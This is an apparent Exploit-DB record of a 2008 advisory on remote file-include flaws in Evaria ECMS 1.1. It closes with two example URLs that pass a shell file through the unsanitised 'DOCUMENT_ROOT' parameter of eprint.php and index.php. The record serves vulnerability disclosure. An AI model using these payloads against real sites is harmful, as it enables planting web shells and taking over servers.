Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities

2008-07-16T00:00:00
ID EDB-ID:32057
Type exploitdb
Reporter ahmadbady
Modified 2008-07-16T00:00:00

Description

Evaria ECMS 1.1 'DOCUMENT_ROOT' Parameter Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30262/info

ECMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

ECMS 1.1 is vulnerable; other versions may also be affected.

http://www.example.com/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt?
http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt?